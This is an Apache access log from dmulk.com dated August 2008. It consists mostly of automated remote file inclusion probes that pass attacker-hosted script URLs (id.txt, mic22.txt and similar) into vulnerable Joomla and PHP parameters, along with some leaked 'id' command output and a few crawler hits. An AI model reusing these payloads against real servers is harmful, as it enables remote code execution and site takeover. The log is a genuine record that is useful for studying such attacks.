85.214.76.207 - - [07/Aug/2008:11:15:28 -0700] "GET /logs/access_080221.log/index.php?incl=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:15:33 -0700] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:11:15:33 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:15:34 -0700] "GET /logs/access_080404.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:15:34 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:15:34 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:15:35 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:15:35 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.133.102.211 - - [07/Aug/2008:11:15:50 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:16:53 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:16:54 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:16:54 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:11:16:56 -0700] "GET /bikes/dteel/2008_02_16/?M=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:16:58 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:17:11 -0700] "GET /logs/access_080118.log///squirrelcart/cart_content.php?cart_isp_root=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:17:14 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:17:14 -0700] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:17:16 -0700] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.158.221.227 - - [07/Aug/2008:11:17:16 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:17:18 -0700] "GET /logs/access_080127.log/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:17:20 -0700] "GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:17:20 -0700] "GET /logs/modules/projects/vw_files.php?dPconfig[root_dir]=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:17:28 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:17:28 -0700] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:17:29 -0700] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.255.21.195 - - [07/Aug/2008:11:17:36 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.195.37.125 - - [07/Aug/2008:11:17:48 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.0" 200 1551 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.125 - - [07/Aug/2008:11:17:48 -0700] "GET /blog/wp-admin/css/login.css?version=2.5.1 HTTP/1.0" 200 1436 "http://dmulk.com/blog/wp-login.php?action=lostpassword" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
67.195.37.125 - - [07/Aug/2008:11:17:48 -0700] "GET /blog/wp-admin/css/colors-fresh.css?version=2.5.1 HTTP/1.0" 200 13212 "http://dmulk.com/blog/wp-login.php?action=lostpassword" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "dmulk.com"
88.214.192.29 - - [07/Aug/2008:11:18:05 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://bloggreenwood.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.197.179.131 - - [07/Aug/2008:11:18:11 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:11:18:22 -0700] "GET /logs/access_080103.log%20//akocomments.php?mosConfig_absolute_path=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.34.240.47 - - [07/Aug/2008:11:18:23 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:18:34 -0700] "GET /logs/access_080401.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.231.132.107 - - [07/Aug/2008:11:18:40 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:18:41 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:18:51 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:18:52 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:19:00 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:19:03 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:19:03 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 200 18517 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:19:05 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:19:06 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=? HTTP/1.1" 200 18413 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:19:07 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:19:36 -0700] "GET /logs//ashnews.php?pathtoashnews=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:19:37 -0700] "GET //ashnews.php?pathtoashnews=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:19:54 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.182.98 - - [07/Aug/2008:11:19:57 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:11:19:59 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:11:19:59 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:11:19:59 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:11:19:59 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [07/Aug/2008:11:20:11 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://dsvv.org/dsvv/user_file/iblees/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [07/Aug/2008:11:20:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dsvv.org/dsvv/user_file/iblees/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:20:21 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:20:26 -0700] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.39.5.203 - - [07/Aug/2008:11:20:48 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://dsvv.org/dsvv/user_file/iblees/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:20:56 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:20:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:20:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:21:20 -0700] "GET /logs/access_080302.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:21:20 -0700] "GET /logs/access_080302.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:21:32 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:21:35 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 18489 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:21:36 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.225.218.2 - - [07/Aug/2008:11:22:13 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.39 - - [07/Aug/2008:11:22:38 -0700] "GET /presto/?D=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:22:48 -0700] "GET /logs/access_080401.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:23:12 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:23:33 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 18489 "-" "libwww-perl/5.812" "www.dmulk.com"
208.80.193.33 - - [07/Aug/2008:11:23:43 -0700] "GET / HTTP/1.0" 200 18221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {449F88E9-E8B5-4D2D-B9ED-5107F97F66D4}; .NET CLR 1.1.4322; MEGAUPLOAD 1.0)" "dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:23:47 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:24:23 -0700] "GET /solpot.html?body=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:24:23 -0700] "GET /logs/solpot.html?body=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:11:25:14 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:11:25:14 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:11:25:14 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [07/Aug/2008:11:25:20 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.30 - - [07/Aug/2008:11:25:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [07/Aug/2008:11:25:23 -0700] "GET /logs/access_080301.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:25:26 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:25:48 -0700] "GET /logs/port.php?content=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:11:25:49 -0700] "GET /port.php?content=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:25:49 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:25:49 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:25:49 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:25:49 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:25:56 -0700] "GET /logs/access_080121.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:25:56 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:25:57 -0700] "GET /logs/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:27:16 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:27:16 -0700] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:27:31 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:27:32 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 200 18489 "-" "libwww-perl/5.812" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:27:42 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:27:43 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:27:48 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.82.54 - - [07/Aug/2008:11:27:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:28:28 -0700] "GET /logs/access_080105.log/index.php?incl=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.76.207 - - [07/Aug/2008:11:28:29 -0700] "GET /index.php?incl=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.803" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:28:59 -0700] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:11:29:26 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [07/Aug/2008:11:29:26 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:29:28 -0700] "GET /logs/access_080218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:29:32 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:29:33 -0700] "GET //bemarket/postscript/postscript.php?p_mode=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:29:36 -0700] "GET /logs/access_080324.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:11:29:43 -0700] "GET /logs/access_080108.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.203.121.1 - - [07/Aug/2008:11:29:43 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:30:12 -0700] "GET /logs/access_080213.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:11:30:15 -0700] "GET /logs/access_080324.log/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:30:21 -0700] "GET /logs/access_080219.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:30:23 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:30:23 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:30:23 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:30:25 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:11:31:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
